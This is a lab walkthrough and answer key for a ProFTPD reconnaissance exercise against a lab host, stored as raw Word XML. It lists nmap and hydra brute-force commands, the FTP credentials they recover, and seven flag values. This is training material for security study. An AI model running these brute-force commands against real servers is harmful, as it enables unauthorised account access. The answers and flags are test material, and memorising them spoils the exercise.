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52E5" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ProFTP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Recon: Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F294F3A" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F4C35">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED150CA" w14:textId="7F9B308D" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="716950FB" wp14:editId="5E062B60">
            <wp:extent cx="5943600" cy="3602990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1366285254" name="Picture 1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44BA" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F4C35">
        <w:t> What is the version of FTP server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFA6A42" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>ProFTPD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve"> 1.3.5a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACB6C40" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390499E8" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00913E24" w14:textId="7D93E84A" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="00DF1AFE" w:rsidP="008F4C35">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E4363A8" wp14:editId="10186367">
            <wp:extent cx="5727994" cy="2235315"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1945968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6812" name="Picture 1945968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8AEC" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F4C35">
        <w:t> Use the username dictionary /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve">-framework/data/wordlists/common_users.txt and password dictionary/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt to check if any of these </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>credentials</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve"> work on the system. List all found credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C236125" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44528C7A" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>sysadmin: 654321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE3FB77" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>rooty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>: qwerty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E32C139" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>demo: butterfly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2B7C01" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>auditor: chocolate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B40F31A" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>anon: purple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BB03E4" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve">administrator: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>tweety</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4290F454" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>diag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>tigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DFA24B0" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105E5C8A" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>hydra -L /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve">-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve"> -t 4 ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F10E37E" w14:textId="285D31DE" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="00A631BC" w:rsidP="008F4C35">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A4EE6D8" wp14:editId="2FDC15CC">
            <wp:extent cx="5835950" cy="4038808"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="342743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43984" name="Picture 3427439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0595" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve"> Find the password of user “sysadmin” using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve"> script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D86F06E" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>Answer: 654321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC29ADB" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BB96CD" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>echo "sysadmin" &gt; users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17952F1C" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve"> --script ftp-brute --script-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>userdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve">=/root/users -p 21 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="513D0995" w14:textId="708D8F86" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="00A631BC" w:rsidP="008F4C35">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01C80DE1" wp14:editId="2B568E72">
            <wp:extent cx="5677192" cy="2571882"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4653260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26066" name="Picture 4653260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6CC0" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F4C35">
        <w:t> Find seven flags hidden on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E49D080" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D094AB" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>Flag1: 260ca9dd8a4577fc00b7bd5810298076</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE4399D" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>Flag2: e529a9cea4a728eb9c5828b13b22844c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A831F8A" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>Flag3: d6a6bc0db10694a2d90e3a69648f3a03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435DD35D" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>Flag4: 098f6bcd4621d373cade4e832627b4f6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018275A6" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>Flag5: 1bc29b36f623ba82aaf6724fd3b16718</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E81323" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>Flag6: 21232f297a57a5a743894a0e4a801fc3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5632D12C" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>Flag7: 12a032ce9179c32a6c7ab397b9d871fa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768F77CE" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F40D39" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>Login to ftp server with each found user and retrieve the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AC396B" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B23A57E" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve">ftp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2190DAFF" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>Enter username "sysadmin" and password 654321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2E24CE" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E46C734" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t>get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008F4C35">
        <w:t xml:space="preserve"> secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5503F5" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6485C7C3" w14:textId="77777777" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:lastRenderedPageBreak/>
        <w:t>cat secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4D641F" w14:textId="7A3E5F70" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="00A631BC" w:rsidP="008F4C35">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45E03B08" wp14:editId="7236253B">
            <wp:extent cx="5639090" cy="4286470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="106656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81" name="Picture 106656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E2C2" w14:textId="5343BE25" w:rsidR="008F4C35" w:rsidRPr="008F4C35" w:rsidRDefault="008F4C35" w:rsidP="008F4C35">
      <w:r w:rsidRPr="008F4C35">
        <w:t>Similarly retrieving remaining flags by logging into the ftp server with the credentials</w:t>
      </w:r>
      <w:r w:rsidR="00A631BC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4179B8D7" w14:textId="629866B6" w:rsidR="00B608ED" w:rsidRPr="00B608ED" w:rsidRDefault="00B608ED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BA94783" wp14:editId="7DF85EAD">
            <wp:extent cx="4426177" cy="1879697"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="13698532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53243" name="Picture 13698532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8ED" w:rsidRPr="00B60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69"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006C0C69"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008F4C35"/>
    <w:rsid w:val="00A631BC"/>
    <w:rsid w:val="00B608ED"/>
    <w:rsid w:val="00DF1AFE"/>
    <w:rsid w:val="00F6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3864"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{35D106B5-09D9-4279-B48A-30A0D2F7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0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2025-09-17T10:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-17T11:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>